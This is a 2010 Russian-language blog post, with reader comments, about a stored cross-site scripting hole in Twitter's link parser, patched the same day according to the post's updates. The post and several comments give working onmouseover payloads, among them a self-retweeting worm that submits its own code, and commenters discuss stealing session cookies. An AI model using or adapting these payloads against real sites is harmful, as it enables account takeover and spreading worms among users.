Пользователь
34,6
карма
0,0
рейтинг
21 сентября 2010 в 14:38

Активная XSS на Twitter

Скриншот (спасибо lc0d3r):

image
Пример: twitter.com/mr_the/status/25105420721 (там только alert)

Началось всё отсюда (банальное раскрашивание через css) twitter.com/RainbowTwtr, автор не известен.

Достаточно отпостить твитт вида:
http://twitter.com/mr_the#@"onmouseover="jAvascript:alert('Ha-ha! XSS!');"/
и будет много-много радости.

Собственно причина — плохой парсер ссылок, без должной фильтрации.

В целях безопасности, рекомендую временно отключить выполнение JavaScript на twitter.com.

UPD: В NewTwitter xss не работает.
UPD2: На 15:52 (по Киеву) закрыли возможность отправлять подобные твитты. Старые всё ещё работают.
UPD3: 16:46 по Киеву, уязвимость официально закрыли — status.twitter.com/post/1161435117/xss-attack-identified-and-patched
mrThe @mrThe
карма 34,6
рейтинг 0,0
Реклама

Комментарии (105)

n3m0
+2
Молодец!

Фильтруйте все данные приходящие от пользователя!!!
ShamanS
+1
В NewTwitter — работает все еще! При открытии нет, но когда идет обновление, через каждые n секунд выдается alert.
gladkij
0
Мне вот такую штуку послали (пробел после http надо убрать):

http ://t.co/@«onmouseover=»document.getElementById('status').value='RT MoiMrJack';$('.status-update-form').submit();«font-size:500pt;/
halkfild
+1
Это такой маркетинговый ход, чтобы все переходили на новую версию твиттера, так как там это не работает :)

Кстати, так можно спастить от бага до офф. фикса
mrThe
+3
Проблема в том, что возможность перейти на новый твиттер есть далеко не у всех)
avatar2009
+1
А у кого?
mrThe
+2
У избранных великим рандомом! Во всяком случае, в моей ленте новый твиттер может включить всего несколько человек, включая меня.
hesherr
0
А как ты его включаешь? Через настройки?
homm
0
А как вообще узнать, есть у меня эта возможность, или нет?
mrThe
+7
Сверху появится вот такая кнопочка:
avatar2009
+1
Может, если подделать кнопочку у себя, она и у других включится?
mrThe
0
Проверяли уже — не включается. По клику идёт вот такое обращение: twitter.com/account/use_phx?setting=true
Попробуйте, вдруг получится.
avatar2009
0
Все-таки нет. Ничего, скоро и на нашей улице будет праздник.
DeeZ
0
А у меня сработало и включилось. Спасибо!
Предложения как на скриншоте выше у меня не было.
mrThe
+2
Кстати, у меня это предложение блокировал один из плагинов)
hesherr
0
Понятно, спасибо!
greengarlic
+7
хреноватенькие тестеры у них
Dr_Logic
0
Им походу нужно форсировать распространение новой версии. Если она так долго по серверам ползет, как долго будет распространяться фикс?
Dr_Logic
+1
А ведь стоит написать короткий скрипт, и добавить к нему трендовый хештег — и можно насобирать кучу кукисов. Кукисы с твиттера чегонибудь дают?
SvnWeb
–1
сморя че в них хранится
alekztrz
0
Авторизация хранится. Можно зайти под чужим аккаунтом, подменив куки.
noRerih
+3
некоторые сайты используют для авторизации твиттеровский OAuth
loshvitalik
0
Так, черт, я туплю :) Пытался дотянуться до крестика вкладки, проводя мышь напрямую, через ссылку, уберите это :)
Zubchick
0
Разноцветные твиты twitter.com/RainbowTwtr появились у меня на странице, сразу все одновременно, хотя я этого RainbowTwtr не фоловил. Через минуту они исчезли.
jtraub
+2
Значит кто-то из тех кого вы фолловите ретвитнул сообщения RainbowTwtr, а потом нажал Undo
biophreak
+3
twitter.com/biophreak у меня теперь настоящий коммунистический твиттер (:
homm
+1
А теперь то же самое с хеш-тегом, например #prinsjesdag
biophreak
0
с хештегом не работает — постит текстом… либо у меня руки не оттуда :)
Можете попробовать, если че:
twitter.com/thenickname#@"style="background-color:red;color:red;position:fixed;left:0;top:0;width:100%;height:100%;z-index:9999999"/
Ag0nizer
0
Баги твиттера иногда задалбывают. Вроде кучу денег вложили в проект, почему так трудно довести его до ума?
Requilence
+12

Переходим на CSS3 ;-)
Requilence
+17
Новый тренд. Самое впечатляющее JS-приложение в 140 символах.
biophreak
+1
меньше, там еще ссылка, собачка, решетка, и мелочи всякие (:
land
0
возвращаемся к временам ASM, приложение в минимальном количестве символов )
n3m0
0
Я вижу используют эту xss. Давайте хоть тег писать #twitter_xss?
land
+2
символов и так мало ))
dohlik
0
Noscript как бе говорит «пофигу» ))
НЛО прилетело и опубликовало эту надпись здесь
mcm69
+2
всё, черви пошли. не ходите на вебморду
homm
+6
Twi-вирус:
http: //a.no/@"onmouseover=";$('textarea:first').val
(this.innerHTML);$('.status-update-form').submit()" style="color:#000;background:#000;/
chaliy
0
Аха, уже вся лента забита. Прикольно.
gl00k
+1
Мне пришел авторетвит: habreffect.ru/files/ba1/06e3909e1/rt.png
Наводишь мышку и автоматом ретвитишь.
biophreak
0
А никто не пробовал еще размещать js на внешних ресурсах и подгружать их?
artem_kovardin
0
хм…
biophreak
0
просто в таком случае можно-же будет вешать события не на mouseover, а, скажем на mousemove и так далее
land
0
ссылка выше на twitter.com/superbacker у него есть такие попытки, наводить проверять не стал )))
biophreak
0
Ха, работает… бугагашенька…
lol2Fast4U
0
artem_kovardin
+1
Мужики, хорош херней страдать! Лента в твиттере уже совсем нечитаема
biophreak
0
ну когда еще такое будет… ща наиграются все и надоест )
biophreak
+1
это же старая дырка… там клиент не фильтровался вроде.
mrThe
0
Это старая уязвимость.
НЛО прилетело и опубликовало эту надпись здесь
Volgarik
–1
это не акк балуется, а твивирус распространется.
НЛО прилетело и опубликовало эту надпись здесь
voidby
–1
А какой командой удаляются аккаунты? :)
Volgarik
0
Сейчас лучше вообще не заходить на веб-морду, запросто вирусняк подцепишь.
lol2Fast4U
+1
Хватит во зло использовать, смотрите и радуйтесь: twitter.com/myfreeweb/statuses/25112218506
Demir0
0
Что там было?)
lol2Fast4U
+1
dima_smol
+1
В ленте пипец просто настал.
Спас Firebug…
GliX
–5
Я понимаю когда найденную довольно опасную уязвимость используют обычные пользователи. Но когда крупная компания, которая стремилась создать себе на Хабре «имя» тоже начинает грешить этим — это переходит все грани. И этой самой фирмой, как ни удивительно, снова оказалась Вконтакте. Вот скриншот:



А вот тут можно глянуть исходный код, дабы исключить фальсификации. И я даже догадываюсь кто это сделал.
Volgarik
+6
крупная компания грешит ламерством
GliX
–2
Это весьма заметно. Сообщение больше 10 минут не удалялось, да и почти одновременно последовавший ретвит несколько другого сообщения от самого Цыплухина как бы намекает. Понабирали по объявлениям…
javac
0
Дуров, кто-же еще =)
antanubis
+9
Забавно, даже когда пишут пост о критической уязвимости на сайте twitter.com, доблестные хабра-юзеры умудряются найти повод написать про то, какой нехороший сайт vkontakte.ru.
ajaxtelamonid
+3
так это они зашли в свой твиттер через морду и словили хак, который отретвитился дальше, разве нет?
hellveen
0
Хотите сказать, что Вконтакте преднамеренно это сделала?
GliX
–1
За менее чем десять минут можно было сообщение удалить? Вроде как люди не совсем далекие от темы, должны были сообразить что это значит.
Assoulter
0
Попался два раза на авторетвите. Firebug помог.
А вообще, mobile.twitter.com и никаких глюков в веб-морде :)
Centro
0
«В целях безопасности, рекомендую временно отключить выполнение Javascript на twitter.com.»
Твиттер без скрипта не работает.
Centro
0
В целях безопасности сейчас лучше всего использовать внешние клиенты.
Pechkin1007
0
Вся лента теперь в этих отправлениях.
НЛО прилетело и опубликовало эту надпись здесь
xoralex
+5
новая твиттер версия упячка
EvgeniyLazarev
0
Всё, уже вылечили.

Кто-нибудь может подсказать, как расшифровываются подобные строки? (переходить не рекомендую, возможно вирус):
http:\u002f\u002fis.gd\u002ffl9A7
hormold
0
Volgarik
0
старые посты продолжают действовать
ArtemPugachev
0
<script language="javascript">
	document.write('http:\u002f\u002fis.gd\u002ffl5d3')
</script>
ArtemPugachev
+1
сорри, это был ответ на сообщение EvgeniyLazarev
Sma11erM1nd
0
Jeditobe
0
Что оно делает?
DYPA
–4
уже достало говорить что пора юзать dabr.co.uk или sexymonday.ru/dabr
Volgarik
+4
уже достало
Maljar
+3
Новое приложение Твиттера «RainbowTwtr» по популярности затмило «Ферму». ВКонтакте — рыдает :)
XPyCT
+1
lol2Fast4U
+2
Ты украл мой код! twitter.com/myfreeweb/statuses/25112218506 см. время
halkfild
0
Ну вот и пофиксили
Mad_D
+5
Ждём, когда @KremlinRussia ретвитнет радугу :)
MakeInstall
0
или @KermlinRussia :)
НЛО прилетело и опубликовало эту надпись здесь
sidristij
+6
Почему до сих пор нет Властелина?
WuWu
0
@ekozlov, @Unlevin, @alexa_cocacola — заставляют ретвить их посты скриптом всех кто за ними следует. Побанить бы их всех за такое… Бедный твиттер
НЛО прилетело и опубликовало эту надпись здесь
НЛО прилетело и опубликовало эту надпись здесь
ajaxtelamonid
0
Это не они, это скрипт сам рассылает эти твиты. Ретвитит сам себя и так распространяется.
mirniy
+1
Вообще-то уже браузер сам ретвитет кого угодно. Ахтунг. Закрываем твиттер и отдыхаем.
SergiuZZZ
0
У меня тоже браузер сам сделал ретвит кода, ретвитов 100+. при этом home, странно себя ведет, делает редирект на direct messages.
Demir0
0
Вот, это и я зацепил.
homm
+1
Я просто оставлю это здесь:
mobile.twitter.com/
НЛО прилетело и опубликовало эту надпись здесь
root_sashok
+1
Я горжусь, что меня фолловит @mr_the :D
XPyCT
+2
Пофиксили. Расходимся (:
spam
–7
кому это интересно? Твиттеры вместе с вконтактами пора поставить на пыльную полочку и забыть о них.
donlimon
+1
А у меня после всех этих забав, главная твиттера выглядит вот так,

Только зарегистрированные пользователи могут оставлять комментарии. Войдите, пожалуйста.

Интересные публикации

Вакансии